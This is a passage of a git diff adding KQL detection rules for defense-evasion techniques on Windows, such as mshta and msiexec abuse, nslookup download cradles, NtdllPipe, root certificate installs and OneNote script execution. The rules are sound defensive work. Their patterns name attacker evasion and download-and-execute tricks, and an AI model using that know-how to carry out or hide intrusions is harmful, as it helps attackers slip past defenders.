"GroupPolicyRefreshTimeOffset" or ProcessCommandLine contains "EnableSmartScreen" or ProcessCommandLine contains "ShellSmartScreenLevel") and ProcessCommandLine contains "\\SOFTWARE\\Policies\\Microsoft\\Windows\\System" and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/msdt_execution_via_answer_file.kql b/KQL/rules/Defense Evasion/msdt_execution_via_answer_file.kql new file mode 100644 index 00000000..ee270698 --- /dev/null +++ b/KQL/rules/Defense Evasion/msdt_execution_via_answer_file.kql @@ -0,0 +1,13 @@ +// Title: MSDT Execution Via Answer File +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-13 +// Level: high +// Description: Detects execution of "msdt.exe" using an answer file which is simulating the legitimate way of calling msdt via "pcwrun.exe" (For example from the compatibility tab). + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, attack.execution +// False Positives: +// - Possible undocumented parents of "msdt" other than "pcwrun". + +DeviceProcessEvents +| where (ProcessCommandLine contains "\\WINDOWS\\diagnostics\\index\\PCWDiagnostic.xml" and (ProcessCommandLine contains " -af " or ProcessCommandLine contains " /af " or ProcessCommandLine contains " –af " or ProcessCommandLine contains " —af " or ProcessCommandLine contains " ―af ") and FolderPath endswith "\\msdt.exe") and (not(InitiatingProcessFolderPath endswith "\\pcwrun.exe")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/mshta_execution_with_suspicious_file_extensions.kql b/KQL/rules/Defense Evasion/mshta_execution_with_suspicious_file_extensions.kql new file mode 100644 index 00000000..59d97807 --- /dev/null +++ b/KQL/rules/Defense Evasion/mshta_execution_with_suspicious_file_extensions.kql @@ -0,0 +1,16 @@ +// Title: MSHTA Execution with Suspicious File Extensions +// Author: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule), Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2019-02-22 +// Level: high +// Description: Detects execution of mshta.exe with file types that looks like they do not typically represent HTA (HTML Application) content, +such as .png, .jpg, .zip, .pdf, and others, which are often polyglots. MSHTA is a legitimate Windows utility for executing HTML Applications +containing VBScript or JScript. Threat actors often abuse this lolbin utility to download and +execute malicious scripts disguised as benign files or hosted under misleading extensions to evade detection. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1140, attack.t1218.005, attack.execution, attack.t1059.007, cve.2020-1599 +// False Positives: +// - False positives depend on scripts and administrative tools used in the monitored environment + +DeviceProcessEvents +| where (ProcessCommandLine contains ".7z" or ProcessCommandLine contains ".avi" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".bmp" or ProcessCommandLine contains ".conf" or ProcessCommandLine contains ".csv" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".doc" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".gz" or ProcessCommandLine contains ".ini" or ProcessCommandLine contains ".jpe" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".json" or ProcessCommandLine contains ".lnk" or ProcessCommandLine contains ".log" or ProcessCommandLine contains ".mkv" or ProcessCommandLine contains ".mp3" or ProcessCommandLine contains ".mp4" or ProcessCommandLine contains ".pdf" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".ppt" or ProcessCommandLine contains ".rar" or ProcessCommandLine contains ".rtf" or ProcessCommandLine contains ".svg" or ProcessCommandLine contains ".tar" or ProcessCommandLine contains ".tmp" or ProcessCommandLine contains ".txt" or ProcessCommandLine contains ".xls" or ProcessCommandLine contains ".xml" or ProcessCommandLine contains ".yaml" or ProcessCommandLine contains ".yml" or ProcessCommandLine contains ".zip" or ProcessCommandLine contains "vbscript") and (FolderPath endswith "\\mshta.exe" or ProcessVersionInfoOriginalFileName =~ "mshta.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/mshtml_dll_runhtmlapplication_suspicious_usage.kql b/KQL/rules/Defense Evasion/mshtml_dll_runhtmlapplication_suspicious_usage.kql new file mode 100644 index 00000000..42e61b24 --- /dev/null +++ b/KQL/rules/Defense Evasion/mshtml_dll_runhtmlapplication_suspicious_usage.kql @@ -0,0 +1,13 @@ +// Title: Mshtml.DLL RunHTMLApplication Suspicious Usage +// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems), Josh Nickels, frack113, Zaw Min Htun (ZETA) +// Date: 2022-08-14 +// Level: high +// Description: Detects execution of commands that leverage the "mshtml.dll" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, http...) + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "#135" or ProcessCommandLine contains "RunHTMLApplication") and (ProcessCommandLine contains "\\..\\" and ProcessCommandLine contains "mshtml") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/msiexec_quiet_installation.kql b/KQL/rules/Defense Evasion/msiexec_quiet_installation.kql new file mode 100644 index 00000000..6e1c87d7 --- /dev/null +++ b/KQL/rules/Defense Evasion/msiexec_quiet_installation.kql @@ -0,0 +1,14 @@ +// Title: Msiexec Quiet Installation +// Author: frack113 +// Date: 2022-01-16 +// Level: medium +// Description: Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. +Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi) + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.007 +// False Positives: +// - WindowsApps installing updates via the quiet flag + +DeviceProcessEvents +| where ((ProcessCommandLine contains "-i" or ProcessCommandLine contains "/i" or ProcessCommandLine contains "–i" or ProcessCommandLine contains "—i" or ProcessCommandLine contains "―i" or ProcessCommandLine contains "-package" or ProcessCommandLine contains "/package" or ProcessCommandLine contains "–package" or ProcessCommandLine contains "—package" or ProcessCommandLine contains "―package" or ProcessCommandLine contains "-a" or ProcessCommandLine contains "/a" or ProcessCommandLine contains "–a" or ProcessCommandLine contains "—a" or ProcessCommandLine contains "―a" or ProcessCommandLine contains "-j" or ProcessCommandLine contains "/j" or ProcessCommandLine contains "–j" or ProcessCommandLine contains "—j" or ProcessCommandLine contains "―j") and (FolderPath endswith "\\msiexec.exe" or ProcessVersionInfoOriginalFileName =~ "msiexec.exe") and (ProcessCommandLine contains "-q" or ProcessCommandLine contains "/q" or ProcessCommandLine contains "–q" or ProcessCommandLine contains "—q" or ProcessCommandLine contains "―q")) and (not((((ProcessIntegrityLevel in~ ("System", "S-1-16-16384")) and InitiatingProcessFolderPath =~ "C:\\Windows\\CCM\\Ccm32BitLauncher.exe") or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\" or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" and InitiatingProcessFolderPath startswith "C:\\Users\\")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/msiexec_web_install.kql b/KQL/rules/Defense Evasion/msiexec_web_install.kql new file mode 100644 index 00000000..fc056a5b --- /dev/null +++ b/KQL/rules/Defense Evasion/msiexec_web_install.kql @@ -0,0 +1,12 @@ +// Title: MsiExec Web Install +// Author: Florian Roth (Nextron Systems) +// Date: 2018-02-09 +// Level: medium +// Description: Detects suspicious msiexec process starts with web addresses as parameter +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.007, attack.command-and-control, attack.t1105 +// False Positives: +// - False positives depend on scripts and administrative tools used in the monitored environment + +DeviceProcessEvents +| where ProcessCommandLine contains " msiexec" and ProcessCommandLine contains "://" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/msxsl_exe_execution.kql b/KQL/rules/Defense Evasion/msxsl_exe_execution.kql new file mode 100644 index 00000000..7c3f9335 --- /dev/null +++ b/KQL/rules/Defense Evasion/msxsl_exe_execution.kql @@ -0,0 +1,14 @@ +// Title: Msxsl.EXE Execution +// Author: Timur Zinniatullin, oscd.community +// Date: 2019-10-21 +// Level: medium +// Description: Detects the execution of the MSXSL utility. This can be used to execute Extensible Stylesheet Language (XSL) files. These files are commonly used to describe the processing and rendering of data within XML files. +Adversaries can abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1220 +// False Positives: +// - Msxsl is not installed by default and is deprecated, so unlikely on most systems. + +DeviceProcessEvents +| where FolderPath endswith "\\msxsl.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/netsh_allow_group_policy_on_microsoft_defender_firewall.kql b/KQL/rules/Defense Evasion/netsh_allow_group_policy_on_microsoft_defender_firewall.kql new file mode 100644 index 00000000..f069d3ac --- /dev/null +++ b/KQL/rules/Defense Evasion/netsh_allow_group_policy_on_microsoft_defender_firewall.kql @@ -0,0 +1,12 @@ +// Title: Netsh Allow Group Policy on Microsoft Defender Firewall +// Author: frack113 +// Date: 2022-01-09 +// Level: medium +// Description: Adversaries may modify system firewalls in order to bypass controls limiting network usage +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.004 +// False Positives: +// - Legitimate administration activity + +DeviceProcessEvents +| where (ProcessCommandLine contains "advfirewall" and ProcessCommandLine contains "firewall" and ProcessCommandLine contains "set" and ProcessCommandLine contains "rule" and ProcessCommandLine contains "group=" and ProcessCommandLine contains "new" and ProcessCommandLine contains "enable=Yes") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/network_connection_initiated_by_addinutil_exe.kql b/KQL/rules/Defense Evasion/network_connection_initiated_by_addinutil_exe.kql new file mode 100644 index 00000000..47eb9926 --- /dev/null +++ b/KQL/rules/Defense Evasion/network_connection_initiated_by_addinutil_exe.kql @@ -0,0 +1,12 @@ +// Title: Network Connection Initiated By AddinUtil.EXE +// Author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri) +// Date: 2023-09-18 +// Level: high +// Description: Detects a network connection initiated by the Add-In deployment cache updating utility "AddInutil.exe". +This could indicate a potential command and control communication as this tool doesn't usually initiate network activity. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceNetworkEvents +| where InitiatingProcessFolderPath endswith "\\addinutil.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/new_capture_session_launched_via_dxcap_exe.kql b/KQL/rules/Defense Evasion/new_capture_session_launched_via_dxcap_exe.kql new file mode 100644 index 00000000..6e7e7e76 --- /dev/null +++ b/KQL/rules/Defense Evasion/new_capture_session_launched_via_dxcap_exe.kql @@ -0,0 +1,13 @@ +// Title: New Capture Session Launched Via DXCap.EXE +// Author: Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems) +// Date: 2019-10-26 +// Level: medium +// Description: Detects the execution of "DXCap.EXE" with the "-c" flag, which allows a user to launch any arbitrary binary or windows package through DXCap itself. This can be abused to potentially bypass application whitelisting. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Legitimate execution of dxcap.exe by legitimate user + +DeviceProcessEvents +| where ProcessCommandLine contains " -c " and (FolderPath endswith "\\DXCap.exe" or ProcessVersionInfoOriginalFileName =~ "DXCap.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/new_dll_registered_via_odbcconf_exe.kql b/KQL/rules/Defense Evasion/new_dll_registered_via_odbcconf_exe.kql new file mode 100644 index 00000000..ace0035c --- /dev/null +++ b/KQL/rules/Defense Evasion/new_dll_registered_via_odbcconf_exe.kql @@ -0,0 +1,12 @@ +// Title: New DLL Registered Via Odbcconf.EXE +// Author: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-22 +// Level: medium +// Description: Detects execution of "odbcconf" with "REGSVR" in order to register a new DLL (equivalent to running regsvr32). Attackers abuse this to install and run malicious DLLs. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.008 +// False Positives: +// - Legitimate DLLs being registered via "odbcconf" will generate false positives. Investigate the path of the DLL and its content to determine if the action is authorized. + +DeviceProcessEvents +| where (ProcessCommandLine contains "REGSVR " and ProcessCommandLine contains ".dll") and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/new_file_association_using_exefile.kql b/KQL/rules/Defense Evasion/new_file_association_using_exefile.kql new file mode 100644 index 00000000..7c94cc0e --- /dev/null +++ b/KQL/rules/Defense Evasion/new_file_association_using_exefile.kql @@ -0,0 +1,10 @@ +// Title: New File Association Using Exefile +// Author: Andreas Hunkeler (@Karneades) +// Date: 2021-11-19 +// Level: high +// Description: Detects the abuse of the exefile handler in new file association. Used for bypass of security products. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceRegistryEvents +| where RegistryValueData =~ "exefile" and RegistryKey contains "Classes\\." \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/new_firewall_rule_added_via_netsh_exe.kql b/KQL/rules/Defense Evasion/new_firewall_rule_added_via_netsh_exe.kql new file mode 100644 index 00000000..fcb58fe6 --- /dev/null +++ b/KQL/rules/Defense Evasion/new_firewall_rule_added_via_netsh_exe.kql @@ -0,0 +1,13 @@ +// Title: New Firewall Rule Added Via Netsh.EXE +// Author: Markus Neis, Sander Wiebing +// Date: 2019-01-29 +// Level: medium +// Description: Detects the addition of a new rule to the Windows firewall via netsh +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.004, attack.s0246 +// False Positives: +// - Legitimate administration activity +// - Software installations + +DeviceProcessEvents +| where ((ProcessCommandLine contains " firewall " and ProcessCommandLine contains " add ") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")) and (not(((ProcessCommandLine contains "advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=" and ProcessCommandLine contains ":\\Program Files (x86)\\Dropbox\\Client\\Dropbox.exe\" enable=yes profile=Any") or (ProcessCommandLine contains "advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=" and ProcessCommandLine contains ":\\Program Files\\Dropbox\\Client\\Dropbox.exe\" enable=yes profile=Any")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/new_process_created_via_taskmgr_exe.kql b/KQL/rules/Defense Evasion/new_process_created_via_taskmgr_exe.kql new file mode 100644 index 00000000..815bca1a --- /dev/null +++ b/KQL/rules/Defense Evasion/new_process_created_via_taskmgr_exe.kql @@ -0,0 +1,12 @@ +// Title: New Process Created Via Taskmgr.EXE +// Author: Florian Roth (Nextron Systems) +// Date: 2018-03-13 +// Level: low +// Description: Detects the creation of a process via the Windows task manager. This might be an attempt to bypass UAC +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036 +// False Positives: +// - Administrative activity + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\taskmgr.exe" and (not((FolderPath endswith ":\\Windows\\System32\\mmc.exe" or FolderPath endswith ":\\Windows\\System32\\resmon.exe" or FolderPath endswith ":\\Windows\\System32\\Taskmgr.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/new_root_certificate_installed_via_certmgr_exe.kql b/KQL/rules/Defense Evasion/new_root_certificate_installed_via_certmgr_exe.kql new file mode 100644 index 00000000..4c4e8b12 --- /dev/null +++ b/KQL/rules/Defense Evasion/new_root_certificate_installed_via_certmgr_exe.kql @@ -0,0 +1,14 @@ +// Title: New Root Certificate Installed Via CertMgr.EXE +// Author: oscd.community, @redcanary, Zach Stanford @svch0st +// Date: 2023-03-05 +// Level: medium +// Description: Detects execution of "certmgr" with the "add" flag in order to install a new certificate on the system. +Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1553.004 +// False Positives: +// - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP + +DeviceProcessEvents +| where (ProcessCommandLine contains "/add" and ProcessCommandLine contains "root") and (FolderPath endswith "\\CertMgr.exe" or ProcessVersionInfoOriginalFileName =~ "CERTMGT.EXE") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/new_root_certificate_installed_via_certutil_exe.kql b/KQL/rules/Defense Evasion/new_root_certificate_installed_via_certutil_exe.kql new file mode 100644 index 00000000..3ad5cfca --- /dev/null +++ b/KQL/rules/Defense Evasion/new_root_certificate_installed_via_certutil_exe.kql @@ -0,0 +1,14 @@ +// Title: New Root Certificate Installed Via Certutil.EXE +// Author: oscd.community, @redcanary, Zach Stanford @svch0st +// Date: 2023-03-05 +// Level: medium +// Description: Detects execution of "certutil" with the "addstore" flag in order to install a new certificate on the system. +Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1553.004 +// False Positives: +// - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP + +DeviceProcessEvents +| where (ProcessCommandLine contains "-addstore" or ProcessCommandLine contains "/addstore" or ProcessCommandLine contains "–addstore" or ProcessCommandLine contains "—addstore" or ProcessCommandLine contains "―addstore") and ProcessCommandLine contains "root" and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/node_process_executions.kql b/KQL/rules/Defense Evasion/node_process_executions.kql new file mode 100644 index 00000000..a87cef39 --- /dev/null +++ b/KQL/rules/Defense Evasion/node_process_executions.kql @@ -0,0 +1,10 @@ +// Title: Node Process Executions +// Author: Max Altgelt (Nextron Systems) +// Date: 2022-04-06 +// Level: medium +// Description: Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1127, attack.t1059.007 + +DeviceProcessEvents +| where FolderPath endswith "\\Adobe Creative Cloud Experience\\libs\\node.exe" and (not(ProcessCommandLine contains "Adobe Creative Cloud Experience\\js")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/nslookup_powershell_download_cradle_processcreation.kql b/KQL/rules/Defense Evasion/nslookup_powershell_download_cradle_processcreation.kql new file mode 100644 index 00000000..801ff407 --- /dev/null +++ b/KQL/rules/Defense Evasion/nslookup_powershell_download_cradle_processcreation.kql @@ -0,0 +1,10 @@ +// Title: Nslookup PowerShell Download Cradle - ProcessCreation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-05 +// Level: medium +// Description: Detects suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents +| where ((ProcessCommandLine contains " -q=txt " or ProcessCommandLine contains " -querytype=txt ") and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")) and (FolderPath contains "\\nslookup.exe" or ProcessVersionInfoOriginalFileName =~ "\\nslookup.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/ntdllpipe_like_activity_execution.kql b/KQL/rules/Defense Evasion/ntdllpipe_like_activity_execution.kql new file mode 100644 index 00000000..bed879da --- /dev/null +++ b/KQL/rules/Defense Evasion/ntdllpipe_like_activity_execution.kql @@ -0,0 +1,10 @@ +// Title: NtdllPipe Like Activity Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-03-05 +// Level: high +// Description: Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents +| where ProcessCommandLine contains "type %windir%\\system32\\ntdll.dll" or ProcessCommandLine contains "type %systemroot%\\system32\\ntdll.dll" or ProcessCommandLine contains "type c:\\windows\\system32\\ntdll.dll" or ProcessCommandLine contains "\\ntdll.dll > \\\\.\\pipe\\" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/obfuscated_powershell_msi_install_via_windowsinstaller_com.kql b/KQL/rules/Defense Evasion/obfuscated_powershell_msi_install_via_windowsinstaller_com.kql new file mode 100644 index 00000000..2d47b001 --- /dev/null +++ b/KQL/rules/Defense Evasion/obfuscated_powershell_msi_install_via_windowsinstaller_com.kql @@ -0,0 +1,15 @@ +// Title: Obfuscated PowerShell MSI Install via WindowsInstaller COM +// Author: Meroujan Antonyan (vx3r) +// Date: 2025-05-27 +// Level: high +// Description: Detects the execution of obfuscated PowerShell commands that attempt to install MSI packages via the Windows Installer COM object (`WindowsInstaller.Installer`). +The technique involves manipulating strings to hide functionality, such as constructing class names using string insertion (e.g., 'indowsInstaller.Installer'.Insert(0,'W')) and correcting +malformed URLs (e.g., converting 'htps://' to 'https://') at runtime. This behavior is commonly associated with malware loaders or droppers that aim to bypass static detection +by hiding intent in runtime-generated strings and using legitimate tools for code execution. The use of `InstallProduct` and COM object creation, particularly combined with +hidden window execution and suppressed UI, indicates an attempt to install software (likely malicious) without user interaction. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027.010, attack.t1218.007, attack.execution, attack.t1059.001 + +DeviceProcessEvents +| where (ProcessCommandLine contains "-ComObject" and ProcessCommandLine contains "InstallProduct(" and ProcessCommandLine contains ".Insert(" and ProcessCommandLine contains "UILevel") and ((FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell_ISE.EXE", "PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/obfuscated_powershell_oneliner_execution.kql b/KQL/rules/Defense Evasion/obfuscated_powershell_oneliner_execution.kql new file mode 100644 index 00000000..13ec9462 --- /dev/null +++ b/KQL/rules/Defense Evasion/obfuscated_powershell_oneliner_execution.kql @@ -0,0 +1,10 @@ +// Title: Obfuscated PowerShell OneLiner Execution +// Author: @Kostastsale, TheDFIRReport +// Date: 2022-05-09 +// Level: high +// Description: Detects the execution of a specific OneLiner to download and execute powershell modules in memory. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1059.001, attack.t1562.001 + +DeviceProcessEvents +| where (ProcessCommandLine contains "http://127.0.0.1" and ProcessCommandLine contains "%{(IRM $_)}" and ProcessCommandLine contains "Invoke") and FolderPath endswith "\\powershell.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/odbcconf_exe_suspicious_dll_location.kql b/KQL/rules/Defense Evasion/odbcconf_exe_suspicious_dll_location.kql new file mode 100644 index 00000000..d5d6c6d0 --- /dev/null +++ b/KQL/rules/Defense Evasion/odbcconf_exe_suspicious_dll_location.kql @@ -0,0 +1,12 @@ +// Title: Odbcconf.EXE Suspicious DLL Location +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-22 +// Level: high +// Description: Detects execution of "odbcconf" where the path of the DLL being registered is located in a potentially suspicious location. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.008 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Registration\\CRMLog" or ProcessCommandLine contains ":\\Windows\\System32\\com\\dmp\\" or ProcessCommandLine contains ":\\Windows\\System32\\FxsTmp\\" or ProcessCommandLine contains ":\\Windows\\System32\\Microsoft\\Crypto\\RSA\\MachineKeys\\" or ProcessCommandLine contains ":\\Windows\\System32\\spool\\drivers\\color\\" or ProcessCommandLine contains ":\\Windows\\System32\\spool\\PRINTERS\\" or ProcessCommandLine contains ":\\Windows\\System32\\spool\\SERVERS\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks_Migrated\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or ProcessCommandLine contains ":\\Windows\\SysWOW64\\com\\dmp\\" or ProcessCommandLine contains ":\\Windows\\SysWOW64\\FxsTmp\\" or ProcessCommandLine contains ":\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\PLA\\System\\" or ProcessCommandLine contains ":\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains ":\\Windows\\Tracing\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\") and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/office_application_initiated_network_connection_over_uncommon_ports.kql b/KQL/rules/Defense Evasion/office_application_initiated_network_connection_over_uncommon_ports.kql new file mode 100644 index 00000000..a715d372 --- /dev/null +++ b/KQL/rules/Defense Evasion/office_application_initiated_network_connection_over_uncommon_ports.kql @@ -0,0 +1,12 @@ +// Title: Office Application Initiated Network Connection Over Uncommon Ports +// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-07-12 +// Level: medium +// Description: Detects an office suit application (Word, Excel, PowerPoint, Outlook) communicating to target systems over uncommon ports. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.command-and-control +// False Positives: +// - Other ports can be used, apply additional filters accordingly + +DeviceNetworkEvents +| where (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe") and (not(((RemotePort in~ ("53", "80", "139", "389", "443", "445", "3268")) or ((RemotePort in~ ("143", "465", "587", "993", "995")) and InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft Office\\" and InitiatingProcessFolderPath endswith "\\OUTLOOK.EXE")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/old_tls1_0_tls1_1_protocol_version_enabled.kql b/KQL/rules/Defense Evasion/old_tls1_0_tls1_1_protocol_version_enabled.kql new file mode 100644 index 00000000..7fbac1fe --- /dev/null +++ b/KQL/rules/Defense Evasion/old_tls1_0_tls1_1_protocol_version_enabled.kql @@ -0,0 +1,12 @@ +// Title: Old TLS1.0/TLS1.1 Protocol Version Enabled +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-09-05 +// Level: medium +// Description: Detects applications or users re-enabling old TLS versions by setting the "Enabled" value to "1" for the "Protocols" registry key. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Legitimate enabling of the old tls versions due to incompatibility + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "\\Control\\SecurityProviders\\SCHANNEL\\Protocols\\TLS 1.0*" or RegistryKey endswith "\\Control\\SecurityProviders\\SCHANNEL\\Protocols\\TLS 1.1*") and RegistryKey endswith "\\Enabled" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/onenote_attachment_file_dropped_in_suspicious_location.kql b/KQL/rules/Defense Evasion/onenote_attachment_file_dropped_in_suspicious_location.kql new file mode 100644 index 00000000..bcda8393 --- /dev/null +++ b/KQL/rules/Defense Evasion/onenote_attachment_file_dropped_in_suspicious_location.kql @@ -0,0 +1,12 @@ +// Title: OneNote Attachment File Dropped In Suspicious Location +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-22 +// Level: medium +// Description: Detects creation of files with the ".one"/".onepkg" extension in suspicious or uncommon locations. This could be a sign of attackers abusing OneNote attachments +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Legitimate usage of ".one" or ".onepkg" files from those locations + +DeviceFileEvents +| where ((FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains ":\\Temp\\") and (FolderPath endswith ".one" or FolderPath endswith ".onepkg")) and (not((InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft Office\\" and InitiatingProcessFolderPath endswith "\\ONENOTE.EXE"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/onenote_exe_execution_of_malicious_embedded_scripts.kql b/KQL/rules/Defense Evasion/onenote_exe_execution_of_malicious_embedded_scripts.kql new file mode 100644 index 00000000..dff6354b --- /dev/null +++ b/KQL/rules/Defense Evasion/onenote_exe_execution_of_malicious_embedded_scripts.kql @@ -0,0 +1,14 @@ +// Title: OneNote.EXE Execution of Malicious Embedded Scripts +// Author: @kostastsale +// Date: 2023-02-02 +// Level: high +// Description: Detects the execution of malicious OneNote documents that contain embedded scripts. +When a user clicks on a OneNote attachment and then on the malicious link inside the ".one" file, it exports and executes the malicious embedded script from specific directories. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "\\exported\\" or ProcessCommandLine contains "\\onenoteofflinecache_files\\") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\onenote.exe" \ No newline at end of file diff --git 